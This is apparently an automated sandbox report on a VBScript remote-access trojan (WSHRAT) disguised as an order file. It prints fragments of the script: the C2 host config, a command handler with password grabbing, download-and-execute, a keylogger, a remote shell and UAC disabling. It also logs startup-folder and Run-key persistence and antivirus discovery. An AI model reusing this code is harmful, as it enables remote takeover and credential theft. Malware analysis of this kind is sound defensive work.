"cmdv.exe", cmd(2)case "uninstall" uninstallcase "up-n-exec" download cmd (1),cmd (2)case "bring-log" upload installdir & "wshlogs\" & cmd (1), "take-log"case "down-n-exec" sitedownloader cmd (1),cmd (2)case "filemanager" servicestarter cmd(1), "fm-plugin.exe", information() case "rdp" servicestarter cmd(1), "rd-plugin.exe", information()case "keylogger" keyloggerstarter cmd(1), "kl-plugin.exe", information(), 0case "offline-keylogger" keyloggerstarter cmd(1), "kl-plugin.exe", information(), 1case "browse-logs" post "is-logs", enumfaf(installdir & "wshlogs")case "cmd-shell" param = cmd (1) post "is-cmd-shell",cmdshell (param)case "get-processes" post "is-processes", enumprocess()case "disable-uac" if WScript.Arguments.Named.Exists("elevated") = true thenset oReg = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\default:StdRegProv")oReg.SetDwordValue &H80000002,"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System","EnableLUA", 0oReg.SetDwordValue &H80000002,"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System","ConsentPromptBehaviorAdmin", 0oReg = nothingupdatestatus("UAC+Disabled+(Reboot+Required)") end ifcase "elevate" if WScript.Arguments.Named.Exists("elevated") = false thenon error resume nextoneonce.close()oneonce = nothingWScript.CreateObject("Shell.Application").ShellExecute "wscript.exe", " //B " & chr(34) & WScript.ScriptFullName & chr(34) & " /elevated", "", "runas", 1updatestatus("Client+Elevated")WScript.quit elseupdatestatus("Client+Elevated") end ifcase "if-elevate" if WScript.Arguments.Named.Exists("el
            Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.Sleep 1009'<[ recoder : kognito (c) skype : live:unknown.sales64 ]>'=-=-=-=-= config =-=-=-=-=-=-=-=-=-=-=-=-=-=-=host = "chongmei33.publicvm.com"port = 7045installdir = "%temp%"lnkfile = truelnkfolder = true'=-=-=-=-= public var =-=-=-=-=-=-=-=-=-=-=-=-=dim shellobj set shellobj = wscript.createobject("wscript.shell")dim filesystemobjset filesystemobj = createobject("scripting.filesystemobject")dim httpobjset httpobj = createobject("msxml2.xmlhttp")'=-=-=-=-= privat var =-=-=-=-=-=-=-=-=-=-=-=installname = wscript.scriptnamestartup = shellobj.specialfolders ("startup") & "\"installdir = shellobj.expandenvironmentstrings(installdir) & "\"if not filesystemobj.folderexists(installdir) then installdir = shellobj.expandenvironmentstrings("%temp%") & "\"spliter = "|"sleep = 5000 dim responsedim cmddim paraminfo = ""usbspreading = ""startdate = ""dim oneonce'=-=-=-=-= code start =-=-=-=-=-=-=-=-=-=-=-=on error resume nextinstancewhile trueinstallresponse = ""response = post ("is-ready","")cmd = split (response,spliter)select case cmd (0)case "disconnect" wscript.quitcase "reboot" shellobj.run "%comspec% /c shutdown /r /t 0 /f", 0, TRUEcase "shutdown" shellobj.run "%comspec% /c shutdown /s /t 0 /f", 0, TRUEcase "excecute" param = cmd (1) execute paramcase "get-pass" passgrabber cmd(1), "cmdv.exe", cmd(2)case "uninstall" uninstallcase "up-n-exec" download cmd (1),cmd (2)case "bring-log" upload installdir & "wshlogs\" & cmd (1), "take-log"case "down-n-exec" sitedownloader cmd (1),cmd (2)case "filemanager" servicestarter cmd(1), "fm-plugin.exe", information() case "rdp" servicestarter cmd(1), "rd-plugin.exe", information()case "keylogger" keyloggerstarter cmd(1), "kl-plugin.exe", information(), 0case "offline-keylogger" keyloggerstarter cmd(1), "kl-plugin.exe", information(), 1case "browse-logs" post "is-logs", enumfaf(installdir & "wshlogs")case "cmd-shell" param = cmd (1) post "is-cmd-shell",cmdshell (param)case "get-processes" post "is-processes", enumprocess()case "disable-uac" if WScript.Arguments.Named.Exists("elevated") = true thenset oReg = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\default:StdRegProv")oReg.SetDwordValue &H80000002,"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System","EnableLUA", 0oReg.SetDwordValue &H80000002,"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System","ConsentPromptBehaviorAdmin", 0oReg = nothingupdatestatus("UAC+Disabled+(Reboot+Required)") end ifcase "elevate" if WScript.Arguments.Named.Exists("elevated") = false thenon error resume nextoneonce.close()oneonce = nothingWScript.CreateObject("Shell.Application").ShellExecute "wscript.exe", " //B " & chr(34) & WScript.ScriptFullName & chr(34) & " /elevated", "", "runas", 1updatestatus("Client+Elevated")WScript.quit elseupdatestatus("Client+Elevated") end ifcase "if-elevate" if WScript.Arguments.Named.Exists("el
            Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.Sleep 1009'<[ recoder : kognito (c) skype : live:unknown.sales64 ]>'=-=-=-=-= config =-=-=-=-=-=-=-=-=-=-=-=-=-=-=host = "chongmei33.publicvm.com"port = 7045installdir = "%temp%"lnkfile = truelnkfolder = true'=-=-=-=-= public var =-=-=-=-=-=-=-=-=-=-=-=-=dim shellobj set shellobj = wscript.createobject("wscript.shell")dim filesystemobjset filesystemobj = createobject("scripting.filesystemobject")dim httpobjset httpobj = createobject("msxml2.xmlhttp")'=-=-=-=-= privat var =-=-=-=-=-=-=-=-=-=-=-=installname = wscript.scriptnamestartup = shellobj.specialfolders ("startup") & "\"installdir = shellobj.expandenvironmentstrings(installdir) & "\"if not filesystemobj.folderexists(installdir) then installdir = shellobj.expandenvironmentstrings("%temp%") & "\"spliter = "|"sleep = 5000 dim responsedim cmddim paraminfo = ""usbspreading = ""startdate = ""dim oneonce'=-=-=-=-= code start =-=-=-=-=-=-=-=-=-=-=-=on error resume nextinstancewhile trueinstallresponse = ""response = post ("is-ready","")cmd = split (response,spliter)select case cmd (0)case "disconnect" wscript.quitcase "reboot" shellobj.run "%comspec% /c shutdown /r /t 0 /f", 0, TRUEcase "shutdown" shellobj.run "%comspec% /c shutdown /s /t 0 /f", 0, TRUEcase "excecute" param = cmd (1) execute paramcase "get-pass" passgrabber cmd(1), "cmdv.exe", cmd(2)case "uninstall" uninstallcase "up-n-exec" download cmd (1),cmd (2)case "bring-log" upload installdir & "wshlogs\" & cmd (1), "take-log"case "down-n-exec" sitedownloader cmd (1),cmd (2)case "filemanager" servicestarter cmd(1), "fm-plugin.exe", information() case "rdp" servicestarter cmd(1), "rd-plugin.exe", information()case "keylogger" keyloggerstarter cmd(1), "kl-plugin.exe", information(), 0case "offline-keylogger" keyloggerstarter cmd(1), "kl-plugin.exe", information(), 1case "browse-logs" post "is-logs", enumfaf(installdir & "wshlogs")case "cmd-shell" param = cmd (1) post "is-cmd-shell",cmdshell (param)case "get-processes" post "is-processes", enumprocess()case "disable-uac" if WScript.Arguments.Named.Exists("elevated") = true thenset oReg = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\default:StdRegProv")oReg.SetDwordValue &H80000002,"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System","EnableLUA", 0oReg.SetDwordValue &H80000002,"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System","ConsentPromptBehaviorAdmin", 0oReg = nothingupdatestatus("UAC+Disabled+(Reboot+Required)") end ifcase "elevate" if WScript.Arguments.Named.Exists("elevated") = false thenon error resume nextoneonce.close()oneonce = nothingWScript.CreateObject("Shell.Application").ShellExecute "wscript.exe", " //B " & chr(34) & WScript.ScriptFullName & chr(34) & " /elevated", "", "runas", 1updatestatus("Client+Elevated")WScript.quit elseupdatestatus("Client+Elevated") end ifcase "if-elevate" if WScript.Arguments.Named.Exists("el

            Persistence and Installation Behavior

            barindex
            Windows Shell Script Host drops VBS files
            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\ORDER230322.vbsJump to behavior
            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ORDER230322.vbsJump to behavior

            Boot Survival

            barindex
            Drops VBS files to the startup folder
            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ORDER230322.vbsJump to dropped file
            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ORDER230322.vbsJump to behavior
            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ORDER230322.vbsJump to behavior
            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ORDER230322.vbs\:Zone.Identifier:$DATAJump to behavior
            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ORDER230322.vbs\:Zone.Identifier:$DATAJump to behavior
            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ORDER230322.vbs\:Zone.Identifier:$DATAJump to behavior
            Source: C:\Windows\System32\wscript.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run ORDER230322Jump to behavior
            Source: C:\Windows\System32\wscript.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run ORDER230322Jump to behavior

            Hooking and other Techniques for Hiding and Protection

            barindex
            Uses known network protocols on non-standard ports
            Source: unknownNetwork traffic detected: HTTP traffic on port 49698 -> 7045
            Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 7045
            Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 7045
            Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 7045
            Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 7045
            Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 7045
            Source: unknownNetwork traffic detected: HTTP traffic on port 7045 -> 49703
            Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 7045
            Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 7045
            Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 7045
            Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 7045
            Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 7045
            Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 7045
            Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 7045
            Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 7045
            Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 7045
            Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 7045
            Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 7045
            Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 7045
            Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 7045
            Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 7045
            Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 7045
            Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 7045
            Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 7045
            Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 7045
            Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 7045
            Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 7045
            Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 7045
            Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 7045
            Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 7045
            Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 7045
            Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 7045
            Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 7045
            Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 7045
            Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 7045
            Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 7045
            Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 7045
            Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 7045
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            barindex
            Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_logicaldisk
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_logicaldisk
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_logicaldisk
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_logicaldisk
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_logicaldisk
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_logicaldisk
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_logicaldisk
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_logicaldisk
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_logicaldisk
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_logicaldisk
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_logicaldisk
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_logicaldisk
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_logicaldisk
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_logicaldisk
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_logicaldisk
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_logicaldisk
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_logicaldisk
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_logicaldisk
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_logicaldisk
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_logicaldisk
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_logicaldisk
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_logicaldisk
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_logicaldisk
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_logicaldisk
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_logicaldisk
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_logicaldisk
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_logicaldisk
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_logicaldisk
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_logicaldisk
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_logicaldisk
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_logicaldisk
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_logicaldisk
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_logicaldisk
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_logicaldisk
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_logicaldisk
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer

            HIPS / PFW / Operating System Protection Evasion

            barindex
            System process connects to network (likely due to code injection or exploit)
            Source: C:\Windows\System32\wscript.exeDomain query: chongmei33.publicvm.com
            Source: C:\Windows\System32\wscript.exeNetwork Connect: 103.47.144.22 7045Jump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Local\Temp\ORDER230322.vbsJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Local\Temp\ORDER230322.vbsJump to behavior
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\securitycenter2 : select * from antivirusproduct
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\securitycenter2 : select * from antivirusproduct
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\securitycenter2 : select * from antivirusproduct
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\securitycenter2 : select * from antivirusproduct
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\securitycenter2 : select * from antivirusproduct
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\securitycenter2 : select * from antivirusproduct
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\securitycenter2 : select * from antivirusproduct
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\securitycenter2 : select * from antivirusproduct
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\securitycenter2 : select * from antivirusproduct
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\securitycenter2 : select * from antivirusproduct
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\securitycenter2 : select * from antivirusproduct
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\securitycenter2 : select * from antivirusproduct
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\securitycenter2 : select * from antivirusproduct
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\securitycenter2 : select * from antivirusproduct
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\securitycenter2 : select * from antivirusproduct
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\securitycenter2 : select * from antivirusproduct
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\securitycenter2 : select * from antivirusproduct
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\securitycenter2 : select * from antivirusproduct
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\securitycenter2 : select * from antivirusproduct
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\securitycenter2 : select * from antivirusproduct
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\securitycenter2 : select * from antivirusproduct
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\securitycenter2 : select * from antivirusproduct
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\securitycenter2 : select * from antivirusproduct
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\securitycenter2 : select * from antivirusproduct
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\securitycenter2 : select * from antivirusproduct
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\securitycenter2 : select * from antivirusproduct
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\securitycenter2 : select * from antivirusproduct
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\securitycenter2 : select * from antivirusproduct
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\securitycenter2 : select * from antivirusproduct
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\securitycenter2 : select * from antivirusproduct
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\securitycenter2 : select * from antivirusproduct
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\securitycenter2 : select * from antivirusproduct
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\securitycenter2 : select * from antivirusproduct
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\securitycenter2 : select * from antivirusproduct
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\securitycenter2 : select * from antivirusproduct

            Stealing of Sensitive Information

            barindex
            Yara detected WSHRAT
            Source: Yara matchFile source: amsi64_5492.amsi.csv, type: OTHER
            Source: Yara matchFile source: amsi64_2352.amsi.csv, type: OTHER
            Source: Yara matchFile source: amsi64_5448.amsi.csv, type: OTHER
            Source: Yara matchFile source: amsi64_4024.amsi.csv, type: OTHER
            Source: Yara matchFile source: dump.pcap, type: PCAP

            Remote Access Functionality

            barindex
            Yara detected WSHRAT
            Source: Yara matchFile source: amsi64_5492.amsi.csv, type: OTHER
            Source: Yara matchFile source: amsi64_2352.amsi.csv, type: OTHER
            Source: Yara matchFile source: amsi64_5448.amsi.csv, type: OTHER
            Source: Yara matchFile source: amsi64_4024.amsi.csv, type: OTHER
            Source: Yara matchFile source: dump.pcap, type: PCAP
            Detected WSHRat
            Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: Suspicious string up-n-exec
            Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: Suspicious string get-pass
            Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: Suspicious string down-n-exec
            Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: Suspicious string keylogger
            Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: Suspicious string take-log
            Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: Suspicious string up-n-exec
            Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: Suspicious string get-pass
            Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: Suspicious string down-n-exec
            Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: Suspicious string keylogger
            Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: Suspicious string take-log
            Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: Suspicious string up-n-exec
            Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: Suspicious string get-pass
            Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: Suspicious string down-n-exec
            Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: Suspicious string keylogger
            Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: Suspicious string take-log
            Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: Suspicious string up-n-exec
            Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: Suspicious string get-pass
            Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: Suspicious string down-n-exec
            Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: Suspicious string keylogger
            Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: Suspicious string take-log

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid Accounts111
            Windows Management Instrumentation            		21
            Registry Run Keys / Startup Folder            		111
            Process Injection            		1
            Masquerading            		OS Credential Dumping11
            Security Software Discovery            		Remote ServicesData from Local SystemExfiltration Over Other Network Medium11
            Non-Standard Port            		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default Accounts421
            Scripting            		Boot or Logon Initialization Scripts21
            Registry Run Keys / Startup Folder            		111
            Process Injection            		LSASS Memory1
            Remote System Discovery            		Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
            Remote Access Software            		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain Accounts1
            PowerShell            		Logon Script (Windows)Logon Script (Windows)421
            Scripting            		Security Account Manager1
            File and Directory Discovery            		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
            Non-Application Layer Protocol            		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
            Obfuscated Files or Information            		NTDS3
            System Information Discovery            		Distributed Component Object ModelInput CaptureScheduled Transfer12
            Application Layer Protocol            		SIM Card SwapCarrier Billing Fraud

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            ORDER230322.vbs27%ReversingLabsScript-WScript.Trojan.Valyria
            ORDER230322.vbs41%VirustotalBrowse

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            No Antivirus matches

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            chongmei33.publicvm.com
            		103.47.144.22
            		truefalse
              		high

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              chongmei33.publicvm.comfalse
                		high
                http://chongmei33.publicvm.com:7045/is-processesfalse
                  		high
                  http://chongmei33.publicvm.com:7045/is-readyfalse
                    		high

                    World Map of Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public IPs

                    IPDomainCountryFlagASNASN NameMalicious
                    103.47.144.22
                    		chongmei33.publicvm.comPakistan
                    		9009M247GBfalse

                    General Information

                    Joe Sandbox Version:37.0.0 Beryl
                    Analysis ID:832141
                    Start date and time:2023-03-22 11:36:11 +01:00
                    Joe Sandbox Product:CloudBasic
                    Overall analysis duration:0h 9m 14s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                    Number of analysed new started processes analysed:20
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • HDC enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample file name:ORDER230322.vbs
                    Detection:MAL
